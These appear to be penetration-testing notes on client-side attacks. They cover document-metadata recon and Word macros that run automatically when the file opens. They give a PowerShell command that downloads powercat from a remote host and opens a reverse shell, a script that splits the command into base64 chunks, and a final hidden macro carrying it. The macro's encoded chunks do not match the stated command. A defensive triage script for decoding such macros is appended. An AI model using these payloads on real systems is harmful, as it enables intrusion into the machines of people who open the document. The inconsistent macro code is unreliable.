Client-side Attacks

exiftool -a -u quote.pdf

Passive recon: view the metadata of publicly available documents to identify software that may be installed on the target machine

Use Canary Tokens to fingerprint the remote machine

Macros in Word documents

Save as .doc (Word 97-2003 Document)

Macro that opens PowerShell

Sub AutoOpen()
    Mal
End Sub
Sub Document_Open()
    Mal
End Sub
Sub Mal()
    CreateObject("Wscript.Shell").Run "powershell"
End Sub

Reverse shell macro

Encode in base64

echo "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.10/powercat.ps1');powercat -c 10.10.14.10 -p 1337 -e powershell" | base64

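Python script to break output into smaller chunks

# Command line to split; paste the base64 output from the previous step
cmd = "powershell.exe -nop -w hidden -e <base64 output>"
n = 50  # chunk length
for i in range(0, len(cmd), n):
    # Emit one VBA concatenation line per chunk
    print("Str = Str + " + '"' + cmd[i:i+n] + '"')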

Final Macro script

Sub AutoOpen()
    MyMacro
End Sub
Sub Document_Open()
    MyMacro
End Sub
Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
    Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
    Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
    Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA"
    Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
    Str = Str + "A== "
    CreateObject("Wscript.Shell").Run Str
End Sub
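
Blue-team view of the macro above, as an added example (not part of the original notes): a Python triage helper that finds the auto-run entry points, re-joins the chunked Str string and decodes the -enc argument, which PowerShell reads as base64 over UTF-16LE. The function names and the sample macro with its harmless Write-Output payload are constructed for illustration.

```python
import base64
import re

AUTOEXEC = re.compile(r"^\s*Sub\s+(AutoOpen|Document_Open)\s*\(", re.I | re.M)
SHELL_RUN = re.compile(r'CreateObject\("Wscript\.Shell"\)\.Run\s+(\w+)', re.I)
FLAG_ARG = re.compile(r"\s-(e\w*)\s+([A-Za-z0-9+/=]+)", re.I)


def rebuild_string(vba, var):
    """Re-join chunks appended as `var = var + "..."`, the pattern used above."""
    v = re.escape(var)
    pat = re.compile(rf'^\s*{v}\s*=\s*{v}\s*[+&]\s*"([^"]*)"', re.I | re.M)
    return "".join(pat.findall(vba)).strip()


def decode_enc(command):
    """Decode a PowerShell -EncodedCommand argument (base64 over UTF-16LE)."""
    for flag, blob in FLAG_ARG.findall(command):
        # PowerShell accepts any prefix of -EncodedCommand, plus the alias -ec
        if "encodedcommand".startswith(flag.lower()) or flag.lower() == "ec":
            try:
                return base64.b64decode(blob).decode("utf-16-le", errors="replace")
            except ValueError:
                return None  # truncated or damaged blob
    return None


def triage_macro(vba):
    """Report auto-run entry points, the rebuilt command line and its decoded payload."""
    run = SHELL_RUN.search(vba)
    command = rebuild_string(vba, run.group(1)) if run else None
    return {"autoexec": sorted({m.lower() for m in AUTOEXEC.findall(vba)}),
            "command": command,
            "decoded": decode_enc(command) if command else None}


def build_sample():
    """Constructed, harmless sample shaped like the macro in these notes."""
    b64 = base64.b64encode("Write-Output 'macro test'".encode("utf-16-le")).decode()
    cmd = "powershell.exe -nop -w hidden -enc " + b64
    body = "\n".join(f'    Str = Str + "{cmd[i:i + 50]}"' for i in range(0, len(cmd), 50))
    return ("Sub AutoOpen()\n    MyMacro\nEnd Sub\n"
            "Sub Document_Open()\n    MyMacro\nEnd Sub\n"
            "Sub MyMacro()\n    Dim Str As String\n" + body +
            '\n    CreateObject("Wscript.Shell").Run Str\nEnd Sub\n')


if __name__ == "__main__":
    print(triage_macro(build_sample()))
```

To triage a real document, pass triage_macro the VBA source exported from it.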
